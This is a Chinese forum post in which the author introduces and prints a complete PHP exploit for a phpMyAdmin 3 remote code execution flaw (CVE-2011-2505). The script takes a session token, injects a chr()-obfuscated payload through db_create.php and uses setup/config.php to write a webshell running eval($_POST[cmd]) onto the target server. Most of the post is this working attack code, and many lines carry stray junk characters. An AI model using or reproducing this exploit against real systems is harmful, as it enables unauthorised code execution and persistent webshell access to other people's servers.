最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。1 B. n& h' `) r3 L/ c( z. \
+ \* I8 e0 r. t# R昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。 W+ @9 u0 D+ t; v- |
5 C1 A X; `9 P' Y5 H X
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:/ f- Y) {( j9 G- E7 }, U9 q- W/ z
一是session.auto_start = 1;
' ?0 z, y9 Y* s二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。& m- T2 @7 A8 s
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。' E$ Y$ o# j( ]9 {; _' W$ Z6 B5 ?
" h/ ?8 S+ {( J在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。& }$ b, F# g, h; O ?% C- T F
' i7 c3 W2 w5 N+ L
于是写了这个php版本的exp,代码如下:: [6 z1 c/ x/ I; B2 C
/ D @" K4 m3 Z0 M" r+ }#!/usr/bin/php
6 M% A4 w ]5 Y& x* ]9 C<?php
8 S" p; e! s/ }1 s \4 b+ oprint_r('
. E4 l( Q6 F D1 L1 `6 [. _3 y+---------------------------------------------------------------------------+- A/ q& M$ @* a# g
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
% j, C) Q- r _+ H" R% g3 d. K& }/ q' Fby oldjun(www.oldjun.com)
- [1 ?: s" C0 Q9 L! Y9 G1 y/ ^welcome to www.t00ls.net. e- P! Y( E- Y
mail: oldjun@gmail.com
, t4 l0 H M+ [Assigned CVE id: CVE-2011-2505/ \( k7 }( Z+ [# y
+---------------------------------------------------------------------------+; e# m: a9 W% _2 G/ h
');; [6 g! U5 Y: a- {
9 P/ W+ d# H l5 }* z
/**
9 _- [( }: ~* @# N. t * working when the directory:"config" exists and is writeable.
`. @2 }+ t% M; b ]. E**/
' t: Y' _$ o6 W+ x' r, h5 L: d0 \ 0 Q7 M' Z( Y/ ^1 m; D0 O
if ($argc < 3) {
& d4 P% J. `. x( A print_r(' ?7 J# B* [3 a- U
+---------------------------------------------------------------------------+
; f9 T6 H% |% k6 s: xUsage: php '.$argv[0].' host path8 E& v* q. {% s$ b" X- R7 u
host: target server (ip/hostname)* I$ m: w9 X( H- ^# |( P# C1 Y$ C
path: path to pma3$ Y* m, L7 j' l" y) _
Example:
6 B$ N1 x3 X" I/ |# k* M* lphp '.$argv[0].' localhost /pma/( k4 M0 O7 h* G, ?. c( y Q
+---------------------------------------------------------------------------+
/ A# S: C5 I, Y( u* b0 w Y+ m');: s8 Q( |, r4 [7 f/ Y) ]( l+ y/ Y
exit;. V f# G& d' W3 o0 I2 g
}
8 v$ R* c( A! N
# P' U" e; F& [8 ?' U$host = $argv[1];
0 q: g$ e+ j ?$path = $argv[2];) P$ r/ m6 q$ V
7 S3 p' B: Y& h ~- i: I4 [/**9 Y; N! r: ^" K7 x
* Try to determine if the directory:"config" exists
7 o% W8 y* a: A& w1 K**/. |1 I- G/ V; n8 {/ D h
echo "[+] Try to determine if the directory:config exists....\n";
5 a3 |) \4 t# `) d$returnstr=php_request('config/');
5 p+ L+ ?4 Y4 G) [6 W7 jif(strpos($returnstr,'404')){+ @9 ^* A; x q
exit("[-] Exploit Failed! The directory:config do not exists!\n");
u, Y/ Y! q \, V8 U- c t- c4 h}
% `- k ~' Y ^6 J( g. p; p
7 f% @6 X+ C; |% ?9 q+ ~ `0 \/**
$ }& I* K$ s+ `7 V4 G. k * Try to get token and sessionid/ q$ e/ U8 h1 ?0 t& W+ [
**/8 G/ h0 @' S/ a! `& o+ `
echo "[+] Try to get token and sessionid....\n";# n- L# F( E( {0 ]! C. C0 S
$result=php_request('index.php');
+ D. Z5 |9 s1 N: k9 W5 Bpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
5 Y* T( g$ l. T0 W+ d4 A6 c* H$token=$resp[3];
, o# ?: h8 x) j8 @& k- L$sessionid=$resp[1];
+ b! o' \2 P* pif($token && $sessionid){" f' w* k* F! e. W0 k6 \ h
echo "[+] token token\n";
l! c/ B# H" o echo "[+] Session IDsessionid\n";
" d& c/ H* R, p. C5 r' Q, f" [}else{, K8 j9 C9 @* M& T
exit("[-] Can't get token and Session ID,Exploit Failed!\n");# q; k- q# V. i5 \
}
9 [ E" K6 S4 m6 {
# S. c" N9 Q2 L7 l" y6 a3 e0 P: \0 o t/**
c; A s( {" P1 \! I% f * Try to insert shell into session, B) @/ ?* P Q
**/
7 p. |/ J2 v9 jecho "[+] Try to insert shell into session....\n";7 X8 b9 y t) H2 F; |! u% k& K! p
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
" A/ X4 {& { R1 D, ^3 @
, Q r9 y* \) b8 ^! S4 ^/**
8 B# b0 T* l, [% y * Try to create webshell
% A# S4 P: M, J$ w; U7 b; s; F**/
8 e# l; c: A4 F' U vecho "[+] Try to create webshell....\n";
3 h6 b! Z K0 P9 ?- ]0 p! V: c: V) G: Hphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
5 Y& D7 n& b( k$ p9 G" D% B/**+ Y5 S) z# e8 G, l; w% D+ n5 k7 B
* Try to check if the webshell was created successfully
. J( `6 P O1 |. Q9 R**/. _3 N2 k) P N, Z) s; I
echo "[+] Try to check if the webshell was created successfully....\n";
& a( H" |& i% o( j3 b/ z$ }$content=php_request('config/config.inc.php');( J& u8 ~) ]8 p3 Z, e7 o
if(strpos($content,'t00ls')){
- R1 ~% }9 P, k' Q7 P echo "[+] Congratulations! Expoilt successfully....\n";, F/ G. N8 V4 J2 d, L
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
* M: Q& ]/ i( O* U3 ]! f}else{4 ^% u6 a& \: t0 u( N7 N o" v
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
4 c# F3 g6 t5 }5 @! b% M}/ C" u9 Y( |9 i+ H D
) A ]* O% H1 H0 b/ A3 z0 B
function php_request($url,$data='',$cookie=''){* o# }3 \$ _1 n
global $host, $path; G9 g9 o- ?/ [5 P2 g# g, T
3 e4 ?9 v# w1 i+ L, T& y. I/ X
$method=$data?'POST':'GET';' N' H2 o' W; ? F$ Y% x4 T
" f0 Z2 }( x, @0 r% L- ^! V& o
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
0 A) y* C& i6 k! F $packet .= "Accept: */*\r\n";; C' G# v; ] C2 m7 {9 x
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";( G7 _5 l7 n0 W H+ `/ p5 V$ c
$packet .= "Host: $host\r\n";
" Y' U# ^% ?+ l- n5 U+ u0 K $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
) z) X. X) `/ I. Y $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";; k' _- @9 p+ \8 C
$packet .= $cookie?"Cookie: $cookie\r\n":"";6 h7 `) m0 W, N9 Q5 k) X4 `7 R
$packet .= "Connection: Close\r\n\r\n";
. b8 N; `4 o5 ~5 W2 @ $packet .= $data?$data:"";
6 [, j' C/ u, v- i* @* N% _% L7 X# {! t" _" T+ K$ w
$fp = fsockopen(gethostbyname($host), 80);
1 M* c8 U; D" n if (!$fp) {" l* r9 Q. B) a! k4 t
echo 'No response from '.$host; die;( J* ^0 m" Y V% C3 Z
}
7 A7 _2 D" o, p0 J$ j fputs($fp, $packet);1 s% I% N$ H; O" d$ k9 F; H4 k% {
* `' L6 x0 u2 a: `3 q
$resp = '';
7 C* z( i) ]$ F! G: J z6 n6 t% o3 ~+ k/ M) s* Z
while ($fp && !feof($fp))
1 z& g, l: m1 U" q$ k9 ~ $resp .= fread($fp, 1024);2 D. p- p* S% P3 E" j
0 r" T9 U* e3 _) t4 m D return $resp;; o, m4 a; ]6 v/ @; `% g
}3 Y/ f1 C" g- P
8 }0 c/ n6 b; S/ v4 k' C- U?> ; K/ g* Q! g+ ]; Q
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对